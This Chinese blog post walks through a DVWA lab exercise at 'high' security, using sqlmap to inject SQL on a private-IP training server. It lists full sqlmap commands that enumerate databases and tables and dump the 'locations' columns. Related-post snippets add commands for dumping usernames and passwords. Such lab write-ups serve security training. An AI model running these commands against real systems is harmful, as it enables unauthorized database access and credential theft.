dvwa-sql注入high级别sqlmap使用(自制任务)

最新推荐文章于 2025-03-20 18:25:06 发布
原创 最新推荐文章于 2025-03-20 18:25:06 发布
· 987 阅读 · 8 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #web

这篇博客详细记录了一次SQL注入攻击的过程。在高安全级别下,利用cookie信息,针对10.12.202.4/dvwa/vulnerabilities/sqli/的页面,通过sqlmap工具尝试列举数据库、查看当前数据库、获取表名以及提取特定表(locations)的字段(纬度、经度、建筑名称)数据。这个过程揭示了网站的安全漏洞和敏感信息的潜在风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在high安全级别下,我们能够看到进行了一次页面跳转
在这里插入图片描述
使用cookie插件获取cookie信息
在这里插入图片描述

--cookie="4a80203698ca9007ed3373a065349ddd;security=high"

此时用户提交网站为10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php

-u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php"

实际要注入的网站为http://10.12.202.4/dvwa/vulnerabilities/sqli/

--second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/"

用户提交的数据为

--data="id=1&Submit=Submit"

构造完成,尝试列出所有数据库(–batch全自动,不会要求输入y/n)

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" --dbs --batch

在这里插入图片描述
查看目前数据库

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –current-db --batch

查看当前数据库下所有表名

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –tables -D "dvwa" --batch

在这里插入图片描述
发现locations
列出此表所有字段

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –columns -T "locations" -D "dvwa" --batch

在这里插入图片描述

获得维度

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa"  -C "latitude" --batch

在这里插入图片描述
获得经度

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa"  -C "longtitude" --batch

在这里插入图片描述
获得建筑名称

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa"  -C "name" --batch

在这里插入图片描述

JeremyHeria
关注
DVWA+SQL Injection(high)+SQLmap注入实战
Idoit_z的博客
04-07 1652
测试需求分析 1. 手工检测发现存在注入漏洞 High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止常规的SQLMap扫描注入测试,因为SQLMap注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入;但是并不代表High级别不能用SQLMap进行注入测试,此时需要利用其非常规的命令联合操作,如:–second-orde...
DVWA-SQL注入sqlmap安装和使用
m0_64037702的博客
07-12 1215
链接:https://pan.baidu.com/s/1-kQgGgzwAJlIbA6hPbvv9Q 提取码:8eqw 双击安装包进行安装 新建一个文件夹选择安装至这个文件夹 我的电脑找到 属性 点击高级系统设置 出现 “系统属性" , 点击环境变量 出现“环境变量” 在下面的“系统变量”里面找到 Path 变量点击编辑(没有找到的话点击新建) 在变量值那里末尾,填上你的Python安装路径 在path中添加自己python的安装路径就行了 Win+R打开cmd输入python出现这个页面表示安装成功
sqlmap测试dvwa-sql注入high
qq_39511050的博客
08-12 2144
sqlmap测试dvwa-sql注入high
dvwa的三个模式下sqlmap命令一把梭哈
最新发布
2301_81684021的博客
03-20 379
SQL注入SQL Injection,简称SQLi)是一种常见的网络安全攻击手段。攻击者通过在Web应用程序的输入字段(如表单输入框、URL参数等)中注入恶意的SQL代码,从而欺骗数据库执行这些非预期的指令。这种攻击通常发生在应用程序对用户输入的数据未进行充分验证和过滤的情况下当应用程序将用户输入直接拼接到SQL查询语句中时,攻击者可以构造恶意输入,改变原本SQL语句的结构和逻辑,进而实现对数据库的非法操作。
DVWAhigh级别sql注入
weixin_30355437的博客
07-13 576
Sqlmap 高级注入,抓包,然后保存数据到1.txt 1.判断注入sqlmap -r /root/1.txt -p id --second-order "http://192.168.242.1/dvw/vulnerabilities/sqli/" --level 2 #level是注入的等级,默认是1 2.爆数据库 ...
DVWA——SQL注入——sqlmap实现
weixin_46709219的博客
11-14 1550
网络安全-sqlmap学习笔记 sqlmap上面的总连接
SQLMap 注入 DVWA实战
Cobra的博客
12-16 3584
一、low级别 1、进入dvwa界面输入1,点击Submit,得到链接 http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit# 2、我们用sqlmap进行爆破 sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" 我们可以看到需要跳转到login的页面,所以,认为这里.
【渗透测试】 sqlmap工具注入-基于dvwasql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1236
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA-SQL注入
qq_60848021的博客
06-25 1306
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DVWA-SQL Injection 注入&Sqlmap
原味瓜子、的博客
09-22 518
文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入 指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
SQLMapSQLMap DVWA实战
Black coder
10-26 720
SQLMap 注入 DVWA实战
SQL注入高级进阶
06-04
SQL注入高级进阶
sqlmap dvwa SQL Injection使用小记
无心插柳
10-29 9591
sqlmap初步使用,测试环境为dvwa
SQL注入DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 7030
SQL注入DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
sqlmap自动化漏洞利用(DVWA初、中、高)
热门推荐
qq_42620328的博客
10-14 1万+
sqlmap自动化漏洞利用(DVWA
DVWASQL盲注通关教程
weixin_58954236的博客
09-25 644
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。Sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入
Sqlmap
mumuzi2的博客
02-25 428
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
dvwa sql 注入高级
gwl7878的博客
07-07 4141
cat sqli.txt  POST /dvwa/vulnerabilities/sqli/session-input.php HTTP/1.1 Host: 172.19.180.27 Proxy-Connection: keep-alive Content-Length: 19 Cache-Control: max-age=0 Accept: text/html,applicatio
dvwa中等难度sql注入使用sqlmap
01-04
### 使用Sqlmap针对DVWA Medium Level SQL Injection进行渗透测试 对于DVWA中的SQL注入漏洞,在中等安全级别下,可以利用`sqlmap`工具来进行自动化检测和数据提取。为了成功实施这一过程,确保设置正确的参数来匹配目标环境的要求。 #### 准备工作 在启动`sqlmap`之前,先要访问DVWA页面并登录,调整安全性等级至Medium。接着通过浏览器开发者工具捕获请求,从中复制带有有效会话ID(`PHPSESSID`)的Cookie值[^2]。 #### 构建命令行指令 构建用于发起攻击的命令如下所示: ```bash sqlmap -u "http://<target-ip>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" \ --cookie="PHPSESSID=<your-session-id>;security=medium" \ --dbms=mysql --technique=E --level=5 --risk=3 --random-agent ``` 此命令指定了URL路径、必要的Cookies以及数据库管理系统类型(MySQL),同时还设置了技术选项(Technique)为基于错误(Error-based)的方式,并提高了扫描强度(Level)与风险(Risk)- `-u`: 指定目标网址。 - `--cookie`: 提供必需的身份验证信息。 - `--dbms`: 明确指出使用的DBMS种类以便更精确地探测。 - `--technique=E`: 采用基于错误的技术进行尝试。 - `--level=5`: 设置详细的测试水平。 - `--risk=3`: 增加潜在危险操作的可能性。 - `--random-agent`: 随机更改User-Agent头以规避某些防护机制。 #### 获取敏感信息 一旦确认存在可利用的漏洞,可以通过附加更多参数进一步挖掘有价值的数据,比如枚举表名或列名甚至导出具体记录。例如,想要查看名为`users`表格的内容,则追加相应选项: ```bash -D dvwa -T users -C username,password --dump ``` 这将指示`sqlmap`连接到指定数据库(Dvwa),定位特定表(Users)及其字段(User,Password),最后输出所有条目。 #### 注意事项 在整个过程中务必遵守法律法规,仅限于授权范围内开展此类活动。此外,考虑到实际环境中可能存在的防御措施(如WAF),适当调节配置项有助于提高成功率的同时减少被发现的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值